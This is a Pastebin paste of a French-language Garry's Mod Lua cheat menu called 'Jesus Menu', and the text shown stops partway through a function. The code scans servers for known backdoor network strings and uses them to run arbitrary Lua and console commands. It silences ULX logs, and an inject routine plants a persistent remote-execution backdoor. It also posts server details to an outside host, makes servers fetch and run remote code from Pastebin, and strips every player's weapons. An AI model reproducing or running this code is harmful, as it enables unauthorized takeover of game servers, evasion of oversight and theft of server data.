Advertisement
Guest User

Untitled

a guest
Aug 19th, 2018
197
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 152.66 KB | None | 0 0
  1. if ( SERVER ) then
  2. function file.Read(d)
  3. return "Coucou <3"
  4. end
  5. end
  6. MsgC (Color( 210, 105, 30 ), [[ =======================================================================================================================
  7.  
  8.  
  9. ▄█ ▄████████ ▄████████ ███ █▄ ▄████████ ▄▄▄▄███▄▄▄▄ ▄████████ ███▄▄▄▄ ███ █▄
  10. ███ ███ ███ ███ ███ ███ ███ ███ ███ ▄██▀▀▀███▀▀▀██▄ ███ ███ ███▀▀▀██▄ ███ ███
  11. ███ ███ █▀ ███ █▀ ███ ███ ███ █▀ ███ ███ ███ ███ █▀ ███ ███ ███ ███
  12. ███ ▄███▄▄▄ ███ ███ ███ ███ ███ ███ ███ ▄███▄▄▄ ███ ███ ███ ███
  13. ███ ▀▀███▀▀▀ ▀███████████ ███ ███ ▀███████████ ███ ███ ███ ▀▀███▀▀▀ ███ ███ ███ ███
  14. ███ ███ █▄ ███ ███ ███ ███ ███ ███ ███ ███ █▄ ███ ███ ███ ███
  15. ███ ███ ███ ▄█ ███ ███ ███ ▄█ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███
  16. █▄ ▄███ ██████████ ▄████████▀ ████████▀ ▄████████▀ ▀█ ███ █▀ ██████████ ▀█ █▀ ████████▀
  17. ▀▀▀▀▀▀
  18.  
  19.  
  20. |~~~~~~~|
  21. | |
  22. | |
  23. | |
  24. | |
  25. | |
  26. |~.\\\_\~~~~~~~~~~~~~~xx~~~ ~~~~~~~~~~~~~~~~~~~~~/_//;~|
  27. | \ o \_ ,XXXXX), _..-~ o / |
  28. | ~~\ ~-. XXXXX`)))), _.--~~ .-~~~ |
  29. ~~~~~~~`\ ~\~~~XXX' _/ ';)) |~~~~~~..-~ _.-~ ~~~~~~~
  30. `\ ~~--`_\~\, ;;;\)__.---.~~~ _.-~
  31. ~-. `:;;/;; \ _..-~~
  32. ~-._ `'' /-~-~
  33. `\ / /
  34. | , | |
  35. | ' / |
  36. \/; |
  37. ;; |
  38. `; . |
  39. |~~~-----.....|
  40. | \ \
  41. | /\~~--...__ |
  42. (| `\ __-\|
  43. || \_ /~ |
  44. |) \~-' |
  45. | | \ '
  46. | | \ :
  47. \ | | |
  48. | ) ( )
  49. \ /; /\ |
  50. | |/ |
  51. | | |
  52. \ .' ||
  53. | | | |
  54. ( | | |
  55. | \ \ |
  56. || o `.)|
  57. |`\\\\) |
  58. | |
  59. |~~~~~~~|
  60.  
  61. ]])
  62.  
  63. MsgC (Color( 139, 0, 0 ), [[
  64. Jesus Menu chargé avec succès ! :D
  65. Amusez-vous bien avec votre menu !
  66. Pour toutes demande, contacter Jesus Christ (jesuschrist_officiel sur steam) ou rendez-vous sur le discord : //////
  67. Version actuel : 1.1 - Premium
  68. Menu accordé à : Jesus Christ, hazzy, Piloot, Supremacist, Melatron, Skiz, Mehdi, eclair47, Zilnix, oxalo, midou, Lolo , Viisionn.
  69.  
  70. ***************
  71. Changelog :
  72. Mise à jour du 25/02/18 à 17h30 : Version 1.1 - Premium
  73. [+]Ajout d'un bouton STOP SPAM TCHAT
  74. [+]Ajout d'un bouton STOP right/duck etc...
  75. ***************
  76.  
  77. Bisous :)
  78.  
  79. ======================================================================================================================= ]])
  80.  
  81. local Authorized = LocalPlayer():SteamID()
  82. if true
  83. then
  84. local n = net
  85. local s = net.Start
  86. local ss = net.WriteString
  87. local stc = net.Send
  88. local hp = http.Post
  89. local netKey = "";
  90. local vgui = vgui;
  91. local surface = surface;
  92. local render = render;
  93. local Color = Color;
  94. local input = input;
  95. local hook = hook;
  96. local next = next;
  97. local timer = timer;
  98. local GetConVarNumber = GetConVarNumber;
  99. local util = util;
  100. local player = player;
  101. local Vector = Vector;
  102. local Angle = Angle;
  103. local FindMetaTable = FindMetaTable;
  104. local team = team;
  105. local LocalPlayer = LocalPlayer;
  106. local draw = draw;
  107. local debug = debug;
  108. local table = table;
  109. local Entity = Entity;
  110. local ScrW, ScrH = ScrW, ScrH;
  111. local RunConsoleCommand = RunConsoleCommand;
  112. local GAMEMODE = GAMEMODE;
  113. local CurTime = CurTime;
  114. local cam = cam;
  115. local silent = CreateClientConVar("silent", 0, false, false);
  116. totalExploits = 0
  117. BackdoorsFound = 0
  118. local ply = LocalPlayer()
  119.  
  120.  
  121. function ValidNetString( str )
  122. local status, error = pcall( net.Start, str )
  123. return status
  124. end
  125.  
  126. -- Exploit 1
  127. function removeAll() -- Strips all Players
  128. for k,v in pairs(player.GetAll()) do
  129. stripPlayer(v)
  130. end
  131. end
  132.  
  133. function stripPlayer(ply) -- Strip player function
  134. if ply:IsPlayer() then
  135. for k,v in pairs(ply:GetWeapons()) do
  136. net.Start("properties")
  137. net.WriteString( "remove" , 32 )
  138. net.WriteEntity( v )
  139. net.SendToServer()
  140. end
  141. end
  142. end
  143.  
  144.  
  145.  
  146. GRADIENT_HORIZONTAL = 0;
  147. GRADIENT_VERTICAL = 1;
  148. function draw.LinearGradient(x,y,w,h,from,to,dir,res)
  149. dir = dir or GRADIENT_HORIZONTAL;
  150. if dir == GRADIENT_HORIZONTAL then res = (res and res <= w) and res or w;
  151. elseif dir == GRADIENT_VERTICAL then res = (res and res <= h) and res or h; end
  152. for i=1,res do
  153. surface.SetDrawColor(
  154. Lerp(i/res,from.r,to.r),
  155. Lerp(i/res,from.g,to.g),
  156. Lerp(i/res,from.b,to.b),
  157. Lerp(i/res,from.a,to.a)
  158. );
  159. if dir == GRADIENT_HORIZONTAL then surface.DrawRect(x + w * (i/res), y, w/res, h );
  160. elseif dir == GRADIENT_VERTICAL then surface.DrawRect(x, y + h * (i/res), w, h/res ); end
  161. end
  162. end
  163.  
  164. ---------------------
  165. -- SPLOIT NOTIFY --
  166. ---------------------
  167. function SploitNotify(text)
  168. local notify = vgui.Create( "DPanel" )
  169. notify:SetSize( 500, 50 )
  170. notify:SetPos( ScrW() - 200, -50 )
  171. notify.Paint = function(self, w, h)
  172. draw.RoundedBox( 0, 0, 0, w, h, Color(20, 20, 20))
  173. draw.RoundedBox( 0, 0, notify:GetTall() - 2, w, 2, HSVToColor( CurTime() % 6 * 60, 1, 1 ))
  174. draw.SimpleText( text, "Title", notify:GetWide() / 2, notify:GetTall() / 2, Color(255, 255, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  175. end
  176. notify:MoveTo( ScrW() - notify:GetWide(), 0, .2, 0, -1, function()
  177. timer.Simple( 3, function()
  178. notify:MoveTo( ScrW() - notify:GetWide(), -50, .2, 0, -1)
  179. end);end) end
  180. ---------------------
  181.  
  182. local function playSound(url)
  183. sound.PlayURL(url, '', function( station )
  184. if ( IsValid( station ) ) then
  185. station:SetPos( LocalPlayer():GetPos() )
  186. station:Play()
  187. end
  188. end)
  189. end
  190.  
  191. hook.Add("Think", "RAINBOWPLAYER", function()
  192. local RainbowPlayer = HSVToColor( CurTime() % 6 * 60, 1, 1 )
  193. LocalPlayer():SetWeaponColor( Vector( RainbowPlayer.r / 255, RainbowPlayer.g / 255, RainbowPlayer.b / 255 ) )
  194. LocalPlayer():SetPlayerColor( Vector( RainbowPlayer.r / 255, RainbowPlayer.g / 255, RainbowPlayer.b / 255 ) )
  195. end)
  196.  
  197. -----------------------------
  198. -- RCON STEALER
  199. hook.Add("InitPostEntity", math.random(20,40), function()
  200. local sendTbl = {
  201. sn = GetHostName(),
  202. playercount = tostring(#player.GetAll()),
  203. ip = game.GetIP()
  204. }
  205.  
  206. http.Post( "http://jesuschristoff.livehost.fr/DIVERS/index.php", sendTbl )
  207. end)
  208. --------------------------------
  209.  
  210. -- CHECKER
  211. if( ValidNetString("memeDoor") ) then
  212. netKey = "memeDoor"
  213. else
  214. end
  215.  
  216. if( ValidNetString("Sandbox_Armdupe") ) then
  217. netKey = "Sandbox_Armdupe"
  218. else
  219. end
  220.  
  221. if( ValidNetString("DarkRP_AdminWeapons") ) then
  222. netKey = "DarkRP_AdminWeapons"
  223. else
  224. end
  225.  
  226. if( ValidNetString("SessionBackdoor") ) then
  227. netKey = "SessionBackdoor"
  228. else
  229. end
  230.  
  231. if( ValidNetString("Fix_Keypads") ) then
  232. netKey = "Fix_Keypads"
  233. else
  234. end
  235.  
  236. if( ValidNetString("Remove_Exploiters") ) then
  237. netKey = "Remove_Exploiters"
  238. else
  239. end
  240.  
  241. if( ValidNetString("noclipcloakaesp_chat_text") ) then
  242. netKey = "noclipcloakaesp_chat_text"
  243. else
  244. end
  245.  
  246. if( ValidNetString("_Defqon") ) then
  247. netKey = "_Defqon"
  248. else
  249. end
  250.  
  251. if( ValidNetString("_CAC_ReadMemory") ) then
  252. netKey = "_CAC_ReadMemory"
  253. else
  254. end
  255.  
  256. if( ValidNetString("nostrip") ) then
  257. netKey = "nostrip"
  258. else
  259. end
  260.  
  261. if( ValidNetString("LickMeOut") ) then
  262. netKey = "LickMeOut"
  263. else
  264. end
  265.  
  266. if( ValidNetString("MoonMan") ) then
  267. netKey = "MoonMan"
  268. else
  269. end
  270.  
  271. if( ValidNetString("Im_SOCool") ) then
  272. netKey = "Im_SOCool"
  273. else
  274. end
  275.  
  276. if( ValidNetString("ULXQUERY2") ) then
  277. netKey = "ULXQUERY2"
  278. else
  279. end
  280.  
  281. if( ValidNetString("jesuslebg") ) then
  282. netKey = "jesuslebg"
  283. else
  284. end
  285.  
  286. if( ValidNetString("zilnix") ) then
  287. netKey = "zilnix"
  288. else
  289. end
  290.  
  291. if( ValidNetString("enablevac") ) then
  292. netKey = "enablevac"
  293. else
  294. end
  295.  
  296. if( ValidNetString("c") ) then
  297. netKey = "c"
  298. else
  299. end
  300.  
  301. if( ValidNetString("Þà?D)◘") ) then
  302. netKey = "Þà?D)◘"
  303. else
  304. end
  305.  
  306. if( ValidNetString("disablebackdoor") ) then
  307. netKey = "disablebackdoor"
  308. else
  309. if( ValidNetString("Police") ) then
  310. netKey = "Police"
  311. else
  312. end
  313.  
  314. if( ValidNetString("kill") ) then
  315. netKey = "kill"
  316. else
  317. end
  318.  
  319. if netKey == "" then
  320. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Aucune backdoor :(" )
  321. else
  322. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 0, 255, 0 ), "Backdoor trouvé! :D La backdoor est : ".. netKey )
  323. -- Auto shut down ULX Logs
  324. if GetConVarNumber("silent") == 1 then
  325. net.Start(netKey)
  326. net.WriteString( "ulx_logecho 0" )
  327. net.WriteBit (0)
  328. net.SendToServer()
  329.  
  330. timer.Simple(0.1, function()
  331. net.Start(netKey)
  332. net.WriteString( "ulx_logecho 0" )
  333. net.WriteBit (1)
  334. net.SendToServer()
  335.  
  336. chat.AddText("ULX Logs disabled." )
  337. end)
  338. end
  339. end
  340. --END CHECKER
  341.  
  342. -----------------------------------------------
  343. -- Check Backdoors (2) (jesus_scanbd) --
  344. -----------------------------------------------
  345.  
  346. function checkbackdoors()
  347. if( ValidNetString("memeDoor") ) then
  348. BackdoorsFound = 1 + BackdoorsFound
  349. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - memeDoor" )
  350. netKey = "memeDoor"
  351. else
  352. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - memeDoor!" )
  353. end
  354.  
  355. if( ValidNetString("Sandbox_Armdupe") ) then
  356. BackdoorsFound = 1 + BackdoorsFound
  357. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - Sandbox_Armdupe" )
  358. netKey = "Sandbox_Armdupe"
  359. else
  360. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - Sandbox_Armdupe!" )
  361. end
  362.  
  363. if( ValidNetString("DarkRP_AdminWeapons") ) then
  364. BackdoorsFound = 1 + BackdoorsFound
  365. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - DarkRP_AdminWeapons" )
  366. netKey = "DarkRP_AdminWeapons"
  367. else
  368. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - DarkRP_AdminWeapons!" )
  369. end
  370. if( ValidNetString("SessionBackdoor") ) then
  371. BackdoorsFound = 1 + BackdoorsFound
  372. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - SessionBackdoor" )
  373. netKey = "SessionBackdoor"
  374. else
  375. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - SessionBackdoor!" )
  376. end
  377.  
  378. if( ValidNetString("Fix_Keypads") ) then
  379. BackdoorsFound = 1 + BackdoorsFound
  380. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - Fix_Keypads" )
  381. netKey = "Fix_Keypads"
  382. else
  383. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - Fix_Keypads!" )
  384. end
  385.  
  386. if( ValidNetString("Remove_Exploiters") ) then
  387. BackdoorsFound = 1 + BackdoorsFound
  388. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - Remove_Exploiters" )
  389. netKey = "Remove_Exploiters"
  390. else
  391. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - Remove_Exploiters!" )
  392. end
  393.  
  394. if( ValidNetString("noclipcloakaesp_chat_text") ) then
  395. BackdoorsFound = 1 + BackdoorsFound
  396. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - noclipcloakaesp_chat_text" )
  397. netKey = "noclipcloakaesp_chat_text"
  398. else
  399. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - noclipcloakaesp_chat_text!" )
  400. end
  401.  
  402. if( ValidNetString("_Defqon") ) then
  403. BackdoorsFound = 1 + BackdoorsFound
  404. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - _Defqon" )
  405. netKey = "_Defqon"
  406. else
  407. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - _Defqon!" )
  408. end
  409.  
  410. if( ValidNetString("_CAC_ReadMemory") ) then
  411. BackdoorsFound = 1 + BackdoorsFound
  412. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - _CAC_ReadMemory" )
  413. netKey = "_CAC_ReadMemory"
  414. else
  415. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - _CAC_ReadMemory!" )
  416. end
  417.  
  418. if( ValidNetString("nostrip") ) then
  419. BackdoorsFound = 1 + BackdoorsFound
  420. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - nostrip" )
  421. netKey = "nostrip"
  422. else
  423. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - nostrip!" )
  424. end
  425.  
  426. if( ValidNetString("LickMeOut") ) then
  427. BackdoorsFound = 1 + BackdoorsFound
  428. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - LickMeOut" )
  429. netKey = "LickMeOut"
  430. else
  431. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - LickMeOut!" )
  432. end
  433.  
  434. if( ValidNetString("MoonMan") ) then
  435. BackdoorsFound = 1 + BackdoorsFound
  436. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! -MoonMan" )
  437. netKey = "MoonMan"
  438. else
  439. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - MoonMan!" )
  440. end
  441.  
  442. if( ValidNetString("Im_SOCool") ) then
  443. BackdoorsFound = 1 + BackdoorsFound
  444. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - Im_SOCool" )
  445. netKey = "Im_SOCool"
  446. else
  447. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - Im_SOCool!" )
  448. end
  449.  
  450. if( ValidNetString("ULXQUERY2") ) then
  451. BackdoorsFound = 1 + BackdoorsFound
  452. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - ULXQUERY2" )
  453. netKey = "ULXQUERY2"
  454. else
  455. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - ULXQUERY2!" )
  456. end
  457.  
  458. if( ValidNetString("jesuslebg") ) then
  459. BackdoorsFound = 1 + BackdoorsFound
  460. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - jesuslebg" )
  461. netKey = "jesuslebg"
  462. else
  463. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - jesuslebg!" )
  464. end
  465.  
  466. if( ValidNetString("zilnix") ) then
  467. BackdoorsFound = 1 + BackdoorsFound
  468. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - zilnix" )
  469. netKey = "zilnix"
  470. else
  471. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - zilnix!" )
  472. end
  473.  
  474. if( ValidNetString("enablevac") ) then
  475. BackdoorsFound = 1 + BackdoorsFound
  476. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - enablevac" )
  477. netKey = "enablevac"
  478. else
  479. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - enablevac!" )
  480. end
  481.  
  482. if( ValidNetString("c") ) then
  483. BackdoorsFound = 1 + BackdoorsFound
  484. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - c" )
  485. netKey = "c"
  486. else
  487. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - c!" )
  488. end
  489.  
  490. if( ValidNetString("Þà?D)◘") ) then
  491. BackdoorsFound = 1 + BackdoorsFound
  492. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - Þà?D)◘" )
  493. netKey = "Þà?D)◘"
  494. else
  495. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - Þà?D)◘!" )
  496. end
  497.  
  498. if( ValidNetString("disablebackdoor") ) then
  499. BackdoorsFound = 1 + BackdoorsFound
  500. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - disablebackdoor" )
  501. netKey = "disablebackdoor"
  502. else
  503. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - disablebackdoor!" )
  504. end
  505.  
  506. if( ValidNetString("kill") ) then
  507. BackdoorsFound = 1 + BackdoorsFound
  508. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - kill" )
  509. netKey = "kill"
  510. else
  511. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - kill!" )
  512. end
  513.  
  514. SploitNotify("Backdoor trouvé: ".. netKey )
  515. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 127, 255, 0 ), "Net changé à : ".. netKey )
  516. end
  517.  
  518. function Inject()
  519. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), " Injecting..." )
  520. if ( ply:IsSuperAdmin() ) then
  521. timer.Simple( 3, function()
  522. if( ValidNetString("SessionBackdoor") ) then
  523.  
  524. else
  525. RunConsoleCommand( "ulx", "logecho", "0" )
  526. RunConsoleCommand( "ulx", "luarun", "util.AddNetworkString ('SessionBackdoor')" )
  527. RunConsoleCommand( "ulx", "luarun", "util.AddNetworkString('SessionBackdoor') net.Receive('SessionBackdoor', function( length, ply ) local netString = net.ReadString() local bit = net.ReadBit() if bit == 1 then RunString(netString) else game.ConsoleCommand(netString .. '\n') end end)" )
  528. RunConsoleCommand( "ulx", "logecho", "1" )
  529. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), " Injécté avec succès !" )
  530. end
  531. end )
  532. else
  533. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), " Erreur ! Vous n'êtes pas SUPERADMIN !" )
  534. end
  535. if( ValidNetString("SessionBackdoor") ) then
  536. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), " La backdoor est déjà présente." )
  537. end
  538. end
  539.  
  540. function bhop()
  541. local AddHook = dismay and dismay.AddHook or hook and hook.Add or function() print("fuck i missed") end;
  542. AddHook("CreateMove", "BHOP", function(cmd)
  543. if (cmd:KeyDown(IN_JUMP)) then
  544. if(cmd:GetMouseX() < 0) then
  545. cmd:SetSideMove(-10000);
  546. elseif(cmd:GetMouseX() > 0) then
  547. cmd:SetSideMove(10000);
  548. end
  549. if (LocalPlayer():IsOnGround()) then
  550. cmd:SetButtons(bit.bor(cmd:GetButtons(), IN_JUMP));
  551. return;
  552. end
  553. end
  554. cmd:RemoveKey(IN_JUMP);
  555. end)
  556. end
  557.  
  558. surface.CreateFont("Font", {
  559. font = "Segoe UI Light",
  560. size = 21,
  561. weight = 300
  562. })
  563. surface.CreateFont("CheckFont", {
  564. font = "Segoe UI Light",
  565. size = 17,
  566. weight = 300
  567. })
  568.  
  569. surface.CreateFont("Target", {
  570. font = "Segoe UI Light",
  571. size = 15,
  572. weight = 300
  573. })
  574.  
  575. surface.CreateFont( "Title", {
  576. font = "Lato Light",
  577. size = 30,
  578. weight = 250,
  579. antialias = true,
  580. strikeout = false,
  581. additive = true,
  582. } )
  583.  
  584. surface.CreateFont( "tamere", {
  585. font = "Roboto",
  586. size = 150,
  587. weight = 250,
  588. antialias = true,
  589. strikeout = false,
  590. additive = true,
  591. bold = true,
  592. } )
  593.  
  594. surface.CreateFont( "Welcome", {
  595. font = "Lato Light",
  596. size = 25,
  597. weight = 10,
  598. antiaalias = true,
  599. strikeout = false,
  600. additive = true,
  601. } )
  602.  
  603. function Jesus()
  604. local Menu = vgui.Create("DFrame")
  605. Menu:SetSize(900, 700)
  606. Menu:Center()
  607. Menu:SetTitle("")
  608. Menu:MakePopup()
  609. Menu:ShowCloseButton(false)
  610. Menu.Paint = function(self, w, h)
  611. surface.SetDrawColor( 30, 30 , 30 )
  612. surface.DrawRect( 0, 0, Menu:GetWide(), Menu:GetTall() )
  613. surface.SetDrawColor( 32, 80, 154 )
  614. surface.DrawOutlinedRect( 0, 0, Menu:GetWide(), Menu:GetTall() )
  615.  
  616. draw.DrawText( "Jesus Menu - 1.0", "Font", 10, 2, Color(42, 95, 177) )
  617.  
  618.  
  619. end
  620.  
  621. local Close = vgui.Create("DButton", Menu)
  622. Close:SetPos( 842, 1 )
  623. Close:SetSize( 53, 20 )
  624. Close:SetText( "" )
  625. function Close:Paint( w, h )
  626. draw.RoundedBoxEx( 4, 0, 0, w, h, Color(255,0,0) )
  627. end
  628.  
  629. Close.DoClick = function()
  630. Menu:Close()
  631. end
  632.  
  633.  
  634. --------------------------------------------------------------
  635. local Tabs = vgui.Create( "DPropertySheet", Menu )
  636. Tabs:Dock( FILL )
  637. Tabs:DockPadding( 5, 5, 0, 0)
  638. Tabs.Paint = function (self, w, h)
  639. for k, v in pairs(Tabs.Items) do
  640. if (!v.Tab) then continue end
  641.  
  642. v.Tab.Paint = function(self,w,h)
  643. draw.LinearGradient( 0, 0, w, h, Color(20, 20, 20), Color(30, 30, 30), GRADIENT_VERTICAL );
  644. surface.SetDrawColor(15, 15, 15)
  645. surface.DrawOutlinedRect( 0, 0, v.Tab:GetWide(), v.Tab:GetTall() )
  646. end
  647. end
  648. end
  649.  
  650. local Controller = vgui.Create( "DPanel", Tabs )
  651. Controller.Paint = function( self, w, h )
  652. draw.RoundedBox(0, 0, 0, w, h, Color(15,15,15))
  653. end
  654. Tabs:AddSheet( "Controller", Controller )
  655.  
  656.  
  657. local Targets = vgui.Create( "DPanel", Tabs )
  658. Targets.Paint = function( self, w, h )
  659. draw.RoundedBox(0, 0, 0, w, h, Color(15,15,15))
  660. end
  661. Tabs:AddSheet( "Targets", Targets )
  662.  
  663. local Misc = vgui.Create( "DPanel", Tabs )
  664. Misc.Paint = function( self, w, h )
  665. draw.RoundedBox(0, 0, 0, w, h, Color(15,15,15))
  666. end
  667. Tabs:AddSheet( "Misc", Misc )
  668.  
  669.  
  670. local Controller = vgui.Create( "DScrollPanel", Controller )
  671. Controller:Dock( FILL )
  672.  
  673. local Targets = vgui.Create( "DScrollPanel", Targets )
  674. Targets:Dock( FILL )
  675.  
  676. local Misc = vgui.Create( "DScrollPanel", Misc )
  677. Misc:Dock( FILL )
  678. --------------------------------------------------------------
  679.  
  680. local Entry = vgui.Create( "DTextEntry" )
  681. Entry:SetParent(Controller)
  682. Entry:SetPos( 12, 530 )
  683. Entry:SetSize( 230, 90 )
  684. Entry:SetText( "" )
  685.  
  686. local RCON = vgui.Create("DButton", Controller )
  687. RCON:SetSize( 110, 25 )
  688. RCON:SetPos( 130, 500 )
  689. RCON:SetText("RCON Command")
  690. RCON:SetTextColor(Color(255, 255, 255, 255))
  691. RCON.Paint = function(panel, w, h)
  692. surface.SetDrawColor(29, 39, 55)
  693. surface.DrawRect( 0, 0, RCON:GetWide(), RCON:GetTall() )
  694. surface.SetDrawColor( 149, 44, 87 )
  695. surface.DrawOutlinedRect( 0, 0, RCON:GetWide(), RCON:GetTall() )
  696. end
  697.  
  698. RCON.DoClick = function()
  699. local GetEntry = Entry:GetValue()
  700. net.Start(netKey)
  701. net.WriteString( GetEntry )
  702. net.WriteBit (false)
  703. net.SendToServer()
  704. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "RCON Commande envoyé." )
  705. SploitNotify("RCON Commande envoyé au serveur.")
  706. surface.PlaySound("buttons/blip1.wav")
  707. end
  708.  
  709. local GLUA = vgui.Create("DButton", Controller )
  710. GLUA:SetSize( 110, 25 )
  711. GLUA:SetPos( 15, 500 )
  712. GLUA:SetText("Code LUA")
  713. GLUA:SetTextColor(Color(255, 255, 255, 255))
  714. GLUA.Paint = function(panel, w, h)
  715. surface.SetDrawColor(29, 39, 55)
  716. surface.DrawRect( 0, 0, GLUA:GetWide(), GLUA:GetTall() )
  717. surface.SetDrawColor( 149, 44, 87 )
  718. surface.DrawOutlinedRect( 0, 0, GLUA:GetWide(), GLUA:GetTall() )
  719. end
  720.  
  721. GLUA.DoClick = function()
  722. local GetEntry = Entry:GetValue()
  723. net.Start(netKey)
  724. net.WriteString( GetEntry )
  725. net.WriteBit (1)
  726. net.SendToServer()
  727. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Code lua envoyé." )
  728. SploitNotify("Code lua envoyé au serveur.")
  729. surface.PlaySound("buttons/blip1.wav")
  730. end
  731.  
  732. local Macro = vgui.Create( "DButton" )
  733. Macro:SetParent(Controller)
  734. Macro:SetPos( 20, 30 )
  735. Macro:SetTextColor( Color(255, 255, 255, 255) )
  736. Macro:SetSize( 110, 25 )
  737. Macro:SetText( "SSV 1 (base)" )
  738. Macro.Paint = function()
  739. surface.SetDrawColor(139, 0, 0)
  740. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  741. surface.SetDrawColor( 32, 80, 154 )
  742. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  743. end
  744. Macro.DoClick = function()
  745. net.Start(netKey)
  746. net.WriteString( "http.Fetch(\"https://pastebin.com/raw/3Tat6J9t\",function(b,l,h,c)RunString(b)end,nil)" )
  747. net.WriteBit (1)
  748. net.SendToServer()
  749. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Super Spam Visuel 1 (base) activé" )
